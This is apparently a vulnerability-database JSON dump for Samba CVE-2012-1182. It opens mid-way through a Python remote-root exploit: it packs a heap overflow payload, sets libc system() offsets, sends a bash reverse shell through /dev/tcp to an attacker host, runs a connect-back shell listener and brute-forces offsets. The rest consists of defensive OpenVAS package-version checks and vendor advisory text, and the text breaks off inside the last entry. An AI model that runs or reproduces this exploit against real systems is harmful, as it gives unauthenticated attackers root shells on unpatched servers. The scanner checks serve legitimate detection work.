\nbuf+=struct.pack('<H',level)# level2 \nbuf+=struct.pack('<L',1)#auditing_mode \nbuf+=struct.pack('<L',1)#ptr \nbuf+=struct.pack('<L',100000) # r->count \nbuf+=struct.pack('<L',20) # array_size \nbuf+=struct.pack('<L',0) \nbuf+=struct.pack('<L',100) \n \nbuf += (\"A\" * target['chunk_offset']) \n \nbuf+=struct.pack(\"I\", 0); \nbuf+=struct.pack(\"I\", target['system_libc_offset']); \nbuf+=struct.pack(\"I\", 0); \nbuf+=struct.pack(\"I\", target['system_libc_offset']); \nbuf+=struct.pack(\"I\", 0xe8150c70); \nbuf+=\"AAAABBBB\" \n \ncmd = \";;;;/bin/bash -c '/bin/bash 0</dev/tcp/\"+cbhost+\"/\"+cbport+\" 1>&0 2>&0' &\\x00\" \n \ntmp = cmd*(816/len(cmd)) \ntmp += \"\\x00\"*(816-len(tmp)) \n \nbuf+=tmp \nbuf+=\"A\"*(37192-target['chunk_offset']) \nbuf+='z'*(100000 - (28000 + 10000)) \n \nbuf_chunks = [buf[x:x+chunk_size] for x in xrange(0, len(buf), chunk_size)] \nn=0 \n \nfor chunk in buf_chunks: \nif len(chunk) != chunk_size: \n#print \"LAST CHUNK #%d\" % n \nbb = 
unhexlify(pwnsauce['final_chunk'].replace(\"babe\", fid)) + chunk \ns.send(bb) \nelse: \n#print \"CHUNK #%d\" % n \nbb = unhexlify(pwnsauce['data_chunk'].replace(\"babe\", fid)) + chunk \ns.send(bb) \nretbuf = s.recv(rs) \nn=n+1 \n \ns.close() \n \nclass connectback_shell(SocketServer.BaseRequestHandler): \ndef handle(self): \nglobal do_brute \n \nprint \"\\n[!] connectback shell from %s\" % self.client_address[0] \ndo_brute = False \n \ns = self.request \n \nimport termios, tty, select, os \nold_settings = termios.tcgetattr(0) \ntry: \ntty.setcbreak(0) \nc = True \nwhile c: \nfor i in select.select([0, s.fileno()], [], [], 0)[0]: \nc = os.read(i, 1024) \nif c: \nif i == 0: \nos.write(1, c) \n \nos.write(s.fileno() if i == 0 else 1, c) \nexcept KeyboardInterrupt: pass \nfinally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings) \n \nreturn \n \n \nclass ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): \npass \n \n \nif len(sys.argv) != 6: \nprint \"\\n {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}\\n\" \nprint \" usage: %s <targethost> <targetport> <myip> <myport> <target>\\n\" % (sys.argv[0]) \nprint \" targets:\" \ni = 0 \nfor target in targets: \nprint \" %02d) %s\" % (i, target['name']) \ni = i+1 \n \nprint \"\" \nsys.exit(-1) \n \n \ntarget = targets[int(sys.argv[5])] \n \nserver = ThreadedTCPServer((sys.argv[3], int(sys.argv[4])), connectback_shell) \nserver_thread = threading.Thread(target=server.serve_forever) \nserver_thread.daemon = True \nserver_thread.start() \n \nwhile do_brute == True: \nsys.stdout.write(\"\\r{+} TRYING EIP=\\x1b[31m0x%08x\\x1b[0m OFFSET=\\x1b[32m0x%08x\\x1b[0m\" % (target['system_libc_offset'], target['chunk_offset'])) \nsys.stdout.flush() \nexploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target) \n \nif \"finder\" in target: \ntarget['chunk_offset'] += 4 \nelse: \ntarget['system_libc_offset'] += 0x1000 \n \n \nif \"finder\" in target: \nprint \\ \n\"{!} found 
\\x1b[32mNEW\\x1b[0m target: chunk_offset = ~%d, \" \\ \n\"system_libc_offset = 0x%03x\" % \\ \n(target['chunk_offset'], target['system_libc_offset'] & 0xff000fff) \n \nwhile 1: \ntime.sleep(999) \n \nserver.shutdown() \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/116843/samba3-exec.txt"}], "openvas": [{"lastseen": "2019-05-29T18:36:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "Oracle Linux Local Security Checks ELSA-2012-0466", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123943", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123943", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0466", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0466.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123943\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:10:38 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0466\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0466 - samba3x security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0466\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0466.html\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.5.10~0.108.el5_8\", 
rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-23T13:10:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "Check for the Version of openchange", "modified": "2018-01-23T00:00:00", "published": "2013-02-22T00:00:00", "id": "OPENVAS:870928", "href": "http://plugins.openvas.org/nasl.php?oid=870928", "type": "openvas", "title": "RedHat Update for openchange RHSA-2013:0515-02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openchange RHSA-2013:0515-02\n#\n# Authors:\n# System Generated 
Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n\n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n\n This update also fixes the following bugs:\n\n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. 
Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n\n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n\n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\";\n\n\ntag_affected = \"openchange on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-February/msg00055.html\");\n script_id(870928);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 10:02:03 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0515-02\");\n script_name(\"RedHat Update for openchange RHSA-2013:0515-02\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openchange\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n 
script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi-debuginfo\", rpm:\"evolution-mapi-debuginfo~0.28.3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange\", rpm:\"openchange~1.0~4.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-debuginfo\", rpm:\"openchange-debuginfo~1.0~4.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-08T12:57:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "Check for the Version of libsmbclient", "modified": "2018-01-08T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881194", "href": "http://plugins.openvas.org/nasl.php?oid=881194", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2012:0465 centos5 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2012:0465 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can 
redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n \n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. 
After installing this\n update, the smb service will be restarted automatically.\";\n\ntag_affected = \"libsmbclient on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-April/018562.html\");\n script_id(881194);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:40:05 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0465\");\n script_name(\"CentOS Update for libsmbclient CESA-2012:0465 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libsmbclient\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2012-04-11T00:00:00", "id": "OPENVAS:1361412562310870581", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870581", "type": "openvas", "title": "RedHat Update for samba RHSA-2012:0465-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2012:0465-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00002.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870581\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 10:59:22 +0530 (Wed, 11 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0465-01\");\n script_name(\"RedHat Update for samba RHSA-2012:0465-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"samba on Red Hat Enterprise Linux (v. 
5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", 
rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-03T10:57:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "Check for the Version of samba", "modified": "2018-01-03T00:00:00", "published": "2012-04-11T00:00:00", "id": "OPENVAS:870581", "href": "http://plugins.openvas.org/nasl.php?oid=870581", "type": "openvas", "title": "RedHat Update for samba RHSA-2012:0465-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2012:0465-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\";\n\ntag_affected = \"samba on Red Hat Enterprise Linux (v. 
5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00002.html\");\n script_id(870581);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 10:59:22 +0530 (Wed, 11 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name: \"RHSA\", value: \"2012:0465-01\");\n script_name(\"RedHat Update for samba RHSA-2012:0465-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", 
rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881228", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881228", "type": "openvas", "title": "CentOS Update for samba3x CESA-2012:0466 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for samba3x CESA-2012:0466 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
